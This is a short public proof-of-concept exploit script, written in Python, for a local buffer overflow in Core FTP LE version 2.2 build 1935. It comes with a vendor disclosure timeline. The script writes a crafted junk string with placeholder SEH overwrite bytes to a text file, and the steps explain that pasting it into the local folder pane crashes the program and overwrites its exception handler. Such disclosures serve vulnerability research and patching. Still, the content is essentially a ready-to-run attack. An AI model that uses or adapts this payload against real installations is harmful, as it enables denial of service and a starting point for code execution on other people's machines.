#!/usr/bin/python # Exploit Title: Core FTP LE Version 2.2, build 1935 - Local Buffer Overflow (SEH Unicode) # Vulnerability Details: Core FTP LE Version 2.2, build 1935 is prone to a buffer overflow vulnerability that may result in a DoS user local folder selection pane # Exploit Type : DOS # Date: 08-Sep-2019 # Vulnerable Software: Core FTP LE # Version: Version 2.2, build 1935 # Vendor Homepage: http://www.coreftp.com/ # Software Link: http://www.coreftp.com/download/coreftplite.exe # Tested Windows : Windows Vista Ultimate SP2(32-bit), Windows 7 Professional SP1(32-bit) # Exploit Author: Debashis Pal #Timeline # Vulnerability Discover Date: 01-Sep-2019 # Vulnerability Report to Vendor:01-Sep-2019,No responds # Again email to Vendor:05-Sep-2019 ,No responds # Public Disclose : 08-Sep-2019 # PoC # 1. coreftpleversion2-2build1935.txt from POC.py code, open in notepad(coreftpleversion2-2build1935.txt), copy contents # 2. Open Core FTP LE(Version 2.2, build 1935) # 3. Select the left interface(CORE FTP LE,local folder selection pane) # 4. paste contents from notepad # 5. Application will crash and SEH overwritten with Unicode crash = "\x43" * 585 #Junk crash += "\x42" * 2 #nSEH crash += "\x41" * 2 #SEH crash += "\x44" * 411 #More Junk file="coreftpleversion2-2build1935.txt" generate=open(file, "w") generate.write(crash) generate.close #Attachment: Application will crash and SEH overwritten with Unicode.jpg Thank you, Debashis Pal